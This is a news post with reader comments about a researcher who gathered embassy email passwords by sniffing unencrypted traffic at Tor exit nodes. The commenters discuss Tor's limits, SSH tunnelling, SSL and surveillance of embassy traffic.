Tor Used To Collect Embassy Email Passwords

Several readers wrote in to inform us that Swedish security researcher Dan Egerstad has revealed how he collected 100 passwords from embassies and governments worldwide, without hacking into anything: he sniffed Tor exit routers. Both Ars and heise have writeups on Egerstad's blog post, but neither adds much to the original. It's not news that unencrypted traffic exits the Tor network unencrypted, but Egerstad correctly perceived, and called attention to, the lack of appreciation for this fact in organizations worldwide.

Re:Raising the question...

[Anonymous Coward]

Working at a ISP I know for a fact that the RCMP use to monitor the traffic of several embassies with a server installed at the ISP end.

Re:Heh

[charlesnw]

Um. Have you ever used Tor? Did you read the article or even the summary? There is NO MENTION of any vunerabilites in Tor. You are implying that Tor is back doored or somehow otherwise vunerable. This is not the case or what happened here. The information gathering occured via sniffing of an exit router.

and?

[tomstdenis]

I thought it was common knowledge that most exit routes were owned by the very people, people think they need to keep secrets from.

Personally, I'm more afraid of some script kiddie stealing my ID than the man listening to my thoughts ... but then again I grew up in Canada, not Bosnia or whatever :-)

Re:This reminds me...

[SCHecklerX]

if you have an account on the box hosting the pop server, and can use ssh, then just forward pop over ssh. Otherwise, that sucks, you're screwed.

Re:Heh

[kebes]

Indeed. This isn't a problem with TOR per se. If I'm reading the blog post correctly, the security issue he is really identifying is: "don't mix an anonymizer with identifiable actions."

Quite simply, TOR is a system to anonymize, so that the website you are going to can't tell who you are. (e.g. can't correlate between repeated visits, can't use your IP to track you down, etc.) As long as you a surfing in a non-identifiable way, even the exit node doesn't know anything about you, and can't determine which requests came from you, as opposed to someone else in the TOR network.

However, if you use TOR in an identifiable way, such as sending a plaintext email (which has plaintext "To" and "From" fields), then you're not using TOR properly. You are inherently exposing yourself, and the exit node can now learn quite a bit about you. If you are connecting to resources without encryption, then the exit node can sniff the data.

Normally, though, you wouldn't use TOR in combination with a secure site you are logging into, anyway. (What's the point in anonymizing your IP address if you log in with your easily-identifiable username, anyways? The site is obviously going to identify you!) So, really, you should not just turn TOR on and then forget about it, because you shouldn't be sending your email through TOR, nor logging into sites using TOR.

The lesson to learn from his blog post, which he doesn't state plainly enough, is that you should split your web-usage into categories:
1. When browsing in a non-identifiable way, use TOR if you want anonymity.
2. When accessing/logging-in to a trusted resource, don't use TOR. (This includes email, etc.)
3. If you need to access a specific resource while maintaining anonymity, use TOR but make sure you use strong end-to-end encryption for the entire session (and not merely encryption for the login phase).

This is, at least, my understanding. Corrections and clarifications are welcome.

Re:This reminds me...

[Abcd1234]

Or just run openssh with the -D option, which sets up a dynamic proxy that conforms to the SOCKS protocol, and then just point your browser at it.

Assuming, of course, you had access to openssh.

Re:Heh

[HTH NE1]

You can use it in a personally identifying way if what you want to conceal is not your identity but rather your location, or you have a need to communicate securely at your local end so that others at your end won't know where you're going.

There's a balance to be struck with anonymity and security and where you strike it depends on what aspects need to be anonymous and what other aspects need to be secure.

Re:What? No! Can't be! Impossible!

[Mr. Underbridge]

Seriously, people. OF COURSE that works! Man in the middle, anyone? Where's the big deal?

I don't think the guy was billing it as some major technical achievement. The news is the sensitivity of the traffic.

Re:This reminds me...

[turbidostato]

"Don't put too much faith in SSL. Yep, even with SSL, someone can play a man in the middle attack on you."

Just tell me how do you expect to launch a MiM attack against a site I got the public key already on hand. Yeah, well, not a valid case for a USA high school where -it's commonplace, students usually reside up to ten thousand miles away from the premises.

"IPSec is a better choice for remote services."

Yessir, specially when you only can make one side agree. Surely forcing an IPSec tunnel to any single student that wants just to download her e-mail from the school server is the proper, mensurated, well engineered solution for the problem. Just using POP3S? Naaah!

Re:Raising the question...

[Anonymous Coward]

Working at a ISP I know for a fact that the RCMP use to monitor the traffic of several embassies with a server installed at the ISP end.

I doubt it. Decades ago it would have been the RCMP, but today that falls under the domain of the Communications Security Establishment, not the RCMP.

The CSE is Canada's version of the NSA. Betcha didn't know that! We're like a grown-up country after all!